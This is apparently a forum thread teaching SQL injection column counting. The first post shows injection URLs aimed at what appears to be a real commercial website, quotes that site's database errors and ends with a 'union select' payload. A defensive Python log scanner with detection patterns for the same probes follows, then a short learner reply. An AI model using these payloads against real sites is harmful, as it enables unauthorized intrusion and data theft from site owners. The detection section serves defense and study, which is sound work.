First, an explanation.
Up to now, we got the column count with group/order by.
Like this:
Code:
http://www.marinaplast.com/page.php?id=13 group by 6
Quote:
(Unknown column '6' in 'group statement')
Code:
http://www.marinaplast.com/page.php?id=13 group by 5
Why is this happening?
Behind the URL /page.php?id=13 there is a SQL query:
PHP Code:
SELECT * FROM pages WHERE id=13 /** if you don't know what this means, it's time to learn SQL.
http://www.w3schools.com/sql/default.asp **/
The columns in the UNION correspond to the columns selected from the table, so both SELECTs must return the same number of columns.
http://www.w3schools.com/sql/sql_union.asp
For example, if the query is like this:
PHP Code:
SELECT id,title,price,pic,type FROM pages WHERE id=13
then the UNION needs five columns as well:
PHP Code:
SELECT id,title,price,pic,type FROM pages WHERE id=13 UNION SELECT 1,2,3,4,5
Now that we understand this, let's move on.
We know the query behind our URL is
PHP Code:
SELECT * FROM pages WHERE id=13
So let's count the columns behind *.
Code:
http://www.marinaplast.com/page.php?id=13 and (select * from pages)=(select 1)
But we didn't write the columns!
So the error gives the number of columns in the table.
Code:
http://www.marinaplast.com/page.php?id=13 and (select * from pages)=(select 1)
Quote:
(Operand should contain 5 column(s))
It means 5 columns.
Code:
http://www.marinaplast.com/page.php?id=13 div 0 union select 1,2,3,4,5
Hope you learned something.
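
Seen from the defender's side, the three probe shapes in this post (group/order by with a column index, the row-subquery comparison, and union select with numeric literals) leave recognisable query strings in web server logs. The scanner below is an added example, not part of the original post; the log line format, the addresses, the rule names and the sample log are constructed assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, unquote_plus

# Constructed rules for the three probe shapes the post walks through.
PROBES = {
    "by_index": re.compile(r"\b(?:order|group)\s+by\s+\d+\b", re.I),
    "row_compare": re.compile(
        r"\(\s*select\s+\*\s+from\s+\w+\s*\)\s*=\s*\(\s*select\s+\d+\s*\)", re.I),
    "union_literals": re.compile(
        r"\bunion\s+(?:all\s+)?select\s+\d+(?:\s*,\s*\d+)*", re.I),
}
# Assumed log format: <client> "<method> <target> HTTP/x.y" <status>
LOG_LINE = re.compile(r'^(\S+) "\S+ (.*) HTTP/[\d.]+" \d{3}$')
SQL_COMMENT = re.compile(r"/\*.*?\*/", re.S)

def normalize(query):
    """URL-decode twice, blank out inline SQL comments, squeeze whitespace."""
    text = unquote_plus(unquote_plus(query))
    return re.sub(r"\s+", " ", SQL_COMMENT.sub(" ", text))

def classify(target):
    """Return the sorted probe names matched by a request target's query string."""
    query = normalize(urlsplit(target).query)
    return sorted(name for name, rx in PROBES.items() if rx.search(query))

def scan(lines):
    """Map client address -> set of probe names seen across its requests."""
    hits = defaultdict(set)
    for line in lines:
        m = LOG_LINE.match(line.strip())
        if m:
            hits[m.group(1)].update(classify(m.group(2)))
    return {ip: names for ip, names in hits.items() if names}

# Constructed sample log (documentation-range addresses).
SAMPLE_LOG = [
    '203.0.113.7 "GET /page.php?id=13%20group%20by%206 HTTP/1.1" 200',
    '203.0.113.7 "GET /page.php?id=13+and+(select+*+from+pages)=(select+1) HTTP/1.1" 200',
    '203.0.113.7 "GET /page.php?id=13%20div%200%20union%20select%201,2,3,4,5 HTTP/1.1" 200',
    '198.51.100.4 "GET /page.php?id=13 HTTP/1.1" 200',
    '198.51.100.4 "GET /search.php?q=student+union+building HTTP/1.1" 200',
]

if __name__ == "__main__":
    for ip, names in scan(SAMPLE_LOG).items():
        print(ip, sorted(names))
```

A client that trips all three rules in sequence is walking the same column-count procedure as the post; the lasting fix is a parameterized query or an integer cast on id, so none of these strings ever reach the SQL parser.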

Injections are tricky, indeed. I launched my SQL learning like 3 weeks ago and I think I'm starting to understand the concepts pretty well. Here's where I learn:
academy.vertabelo.com